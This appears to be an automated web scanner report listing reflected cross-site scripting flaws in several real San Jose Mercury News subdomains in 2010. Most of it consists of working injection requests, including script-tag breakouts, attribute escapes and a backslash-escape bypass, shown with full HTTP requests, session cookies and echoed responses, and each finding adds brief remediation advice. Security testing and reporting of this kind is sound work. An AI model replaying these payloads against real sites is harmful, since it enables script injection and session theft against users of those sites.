GET /xml/poll-linka4083"-alert(1)-"6c029440ed4 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:00 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22104
1.81. http://forums.mercurynews.com/xml/poll-link [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/xml/poll-link
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82efb"-alert(1)-"694f25fe67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml/poll-link?82efb"-alert(1)-"694f25fe67=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:34 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:58 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22070
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 454b3\'%3balert(1)//851c49b677b was submitted in the version parameter. This input was echoed as 454b3\\';alert(1)//851c49b677b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /FSI/Page.aspx?advid=200177&loc=53824&fsi=14784&version=Mercury454b3\'%3balert(1)//851c49b677b HTTP/1.1 Host: newspaperads.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; s_cc=true; ZZFLSH=29; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 15 Nov 2010 02:09:23 GMT Server: Microsoft-IIS/6.0 X-Server-Name: HW3 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]... newspaperads.mercurynews.com';
The value of the rFreeForm request parameter is copied into an HTML comment. The payload c15c0--><script>alert(1)</script>f18d1ae576c was submitted in the rFreeForm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /portlet/registration/html/info.jsp?rFreeForm=8101685c15c0--><script>alert(1)</script>f18d1ae576c HTTP/1.1 Host: secure.www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><script><!-- window.focus(); //--></script><link type="text/css" rel="stylesheet" href='https://secure.extras.mnginteractive.com/live/css/MNGiDefaultStyles.css'><script> function o ...[SNIP]... <!-- BEGIN FREEFORM RENDER, ID 8101685c15c0--><script>alert(1)</script>f18d1ae576c --> ...[SNIP]...
The value of the rPage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fb02</script><script>alert(1)</script>47f9d8515fe was submitted in the rPage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /registration/?rPage=login6fb02</script><script>alert(1)</script>47f9d8515fe&url=http%3A%2F%2Fwww.mercurynews.com%2F&eRightsSessionExpired=true HTTP/1.1 Host: secure.www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 15 Nov 2010 02:09:38 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=0QISC2X0JL2UMCUUCBWCFFI; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info -->< ...[SNIP]... rBrand = getBrand2(s_account); var PageName = "Registration"; var SectionName = "Registration"; var ArticleTitle = "null"; var FriendlyName = "Registration: login6fb02</script><script>alert(1)</script>47f9d8515fe"; var domainName = getDomainName(); userObj = new omniObj(); userObj.load(); userObj.update(); userObj.save(); /* You may give each page an identifying name, server, and cha ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 586df"><script>alert(1)</script>cb76424f007 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /registration/?rPage=login&url=http%3A%2F%2Fwww.mercurynews.com%2F586df"><script>alert(1)</script>cb76424f007&eRightsSessionExpired=true HTTP/1.1 Host: secure.www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Mon, 15 Nov 2010 02:09:39 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=XBSY2AYHL45GQCUUCAWSFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info -->< ...[SNIP]... <a href="/registration?rPage=register&url=http://www.mercurynews.com/586df"><script>alert(1)</script>cb76424f007®ister=yes"> ...[SNIP]...
The value of the brand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8ab"><script>alert(1)</script>bb838291dac was submitted in the brand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/findweather/getForecast?brand=mercurynewsbe8ab"><script>alert(1)</script>bb838291dac&query=san+jose&searchbutton.x=8&searchbutton.y=8&searchbutton=Search HTTP/1.1 Host: weather.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; ASC=1289776044:1; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:10:46 GMT Server: Apache/1.3.33 (Unix) PHP/4.4.0 X-CreationTime: 0.060 Set-Cookie: ASC=1289787046:2; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com Connection: close Content-Type: text/html Content-Length: 25776
<HTML> <head> <title>Weather </title> </head> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="Pragma" CONTENT"no-cache"> <title>San Jose Mercury N ...[SNIP]... <a href="/auto/mercurynewsbe8ab"><script>alert(1)</script>bb838291dac/CA/San_Jose.html" OnClick='Set_Cookie( "DefLoc", "95101", 365, "/", "mercurynews.com", "");'> ...[SNIP]...
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload f07b5<script>alert(1)</script>7962c56bc63 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the n request parameter is copied into the HTML document as plain text between tags. The payload 1f326<script>alert(1)</script>42f179eed7a was submitted in the n parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the s request parameter is copied into the HTML document as plain text between tags. The payload a6ad2<script>alert(1)</script>0e367d1dc82 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the t request parameter is copied into the HTML document as plain text between tags. The payload a036d<script>alert(1)</script>226d850a15 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.